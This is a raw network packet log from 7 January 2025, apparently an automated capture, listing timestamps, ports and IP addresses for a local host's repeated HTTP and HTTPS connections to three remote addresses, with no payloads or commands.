Jan 7, 2025 13:25:04.862951994 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862979889 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862991095 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863002062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863029957 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863043070 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863061905 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863080978 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863091946 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863126040 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863127947 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863143921 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863156080 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863185883 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863192081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863208055 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863219976 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863233089 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863250017 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863255024 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863327980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863349915 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863362074 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863372087 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.863383055 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.863426924 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.032924891 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.032998085 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033009052 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033023119 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033061981 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033106089 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033313990 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033329964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033339977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033375978 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033401966 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033413887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033423901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033447027 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033464909 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033593893 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033643961 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033658028 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033688068 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033699989 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033700943 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033730984 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.033781052 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033791065 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.033829927 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034210920 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034226894 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034244061 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034255028 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034266949 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034285069 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034287930 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034295082 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034307003 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034328938 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034346104 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034575939 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034610987 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034621000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034634113 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034655094 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034678936 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034724951 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034744024 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034756899 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034769058 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034792900 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034816027 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034894943 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034920931 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034930944 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034966946 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.034970999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.034981012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035007954 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.035018921 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035027981 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035053968 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.035058975 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035070896 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035087109 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035098076 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035098076 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.035126925 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.035172939 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035192966 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035203934 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035214901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.035232067 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.035258055 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.036802053 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036815882 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036825895 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036850929 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.036870956 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036880016 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.036881924 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036894083 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.036926985 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.037024021 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037041903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037060976 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.037062883 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037081003 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037091970 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037096977 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.037115097 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037125111 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.037126064 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.037159920 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038053036 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038074970 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038085938 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038122892 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038126945 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038132906 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038156986 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038162947 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038173914 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038184881 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038194895 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038196087 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038214922 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038836956 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038853884 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038870096 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038882017 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038882971 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038891077 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038901091 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038913012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.038919926 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038938999 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.038953066 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.039347887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.039376020 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.039388895 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.039414883 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.039427996 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.039490938 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:05.125124931 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:05.174567938 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:08.940527916 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:09.733932972 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:09.738729954 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:09.738811016 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:09.739025116 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:09.743789911 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:16.890070915 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:16.896199942 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:16.901021004 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:17.171679974 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:17.212527990 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:18.321924925 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.321969986 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:18.322202921 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.352516890 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.352538109 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:18.820801020 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:18.820873022 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.835695028 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.835724115 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:18.836138010 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:18.885448933 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.953915119 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:18.999336958 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:19.066018105 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:19.066090107 CET	443	49795	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:19.066148043 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:19.219052076 CET	49795	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:19.271027088 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:19.275986910 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:19.550362110 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:19.580728054 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:19.580775023 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:19.581118107 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:19.581376076 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:19.581386089 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:19.602454901 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.039277077 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:20.041855097 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:20.041867018 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:20.204616070 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:20.204687119 CET	443	49802	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:20.204745054 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:20.205173969 CET	49802	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:20.346405983 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.349101067 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.351418018 CET	80	49733	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:20.351473093 CET	49733	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.353918076 CET	80	49807	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:20.353996038 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.354180098 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.358958960 CET	80	49807	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:20.966243029 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.971071959 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:20.971148968 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.971340895 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:20.976162910 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:23.295241117 CET	80	49807	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:23.309597015 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.309648991 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.309705973 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.310264111 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.310281992 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.336682081 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.794224024 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.796571970 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.796607018 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.942893028 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.942960978 CET	443	49826	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:23.943213940 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.943459988 CET	49826	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:23.947467089 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.948385954 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.952406883 CET	80	49807	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:23.952511072 CET	49807	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.953242064 CET	80	49831	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:23.953311920 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.953386068 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:23.958163023 CET	80	49831	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:24.339050055 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:24.350286961 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:24.355128050 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:25.551780939 CET	80	49831	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:25.555459023 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:25.555504084 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:25.555588007 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:25.556217909 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:25.556231022 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:25.601243019 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.029736996 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:26.030172110 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:26.075804949 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:26.075834990 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:26.078233004 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.189856052 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:26.189920902 CET	443	49843	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:26.189968109 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:26.214180946 CET	49843	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:26.252182961 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.257282019 CET	80	49831	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:26.263302088 CET	49831	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.279337883 CET	49848	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.284295082 CET	80	49848	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:26.286314011 CET	49848	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.286412954 CET	49848	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:26.291132927 CET	80	49848	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:27.100621939 CET	80	49848	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:27.101804018 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.101849079 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.101913929 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.102212906 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.102226019 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.143228054 CET	49848	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:27.569715977 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.572000980 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.572021008 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.722335100 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.722408056 CET	443	49854	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:27.722491026 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.722899914 CET	49854	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:27.793942928 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:27.800009966 CET	80	49860	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:27.800160885 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:27.800944090 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:27.805754900 CET	80	49860	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:28.255530119 CET	49848	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:28.585275888 CET	80	49860	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:28.587394953 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.587445021 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:28.587513924 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.587826967 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.587841988 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:28.625334024 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:28.917876959 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.917922974 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:28.917995930 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.934267998 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:28.934286118 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:28.991555929 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:28.996434927 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:28.998387098 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:28.998550892 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.003468037 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.085820913 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.091667891 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.091707945 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.296158075 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.296225071 CET	443	49866	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.296279907 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.296765089 CET	49866	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.300110102 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.301263094 CET	49873	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.307849884 CET	80	49873	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.308063030 CET	80	49860	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.308160067 CET	49860	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.308279037 CET	49873	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.308279037 CET	49873	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.314701080 CET	80	49873	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.432663918 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.432746887 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.434555054 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.434567928 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.434875011 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.491143942 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.503341913 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.547338009 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.617002010 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.617105007 CET	443	49871	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.617191076 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.620592117 CET	49871	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.636305094 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.641207933 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.819106102 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.822537899 CET	49872	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:29.827383995 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.899063110 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:29.901721954 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.901773930 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:29.902054071 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.902401924 CET	49879	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:29.902421951 CET	443	49879	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.078886032 CET	80	49873	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.083240986 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.083283901 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.083359003 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.083589077 CET	49880	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:30.083604097 CET	443	49880	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:30.084480047 CET	80	49872	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.116046906 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.119915009 CET	80	49813	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:30.119991064 CET	49813	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:30.194165945 CET	49873	80	192.168.2.5	132.226.8.169
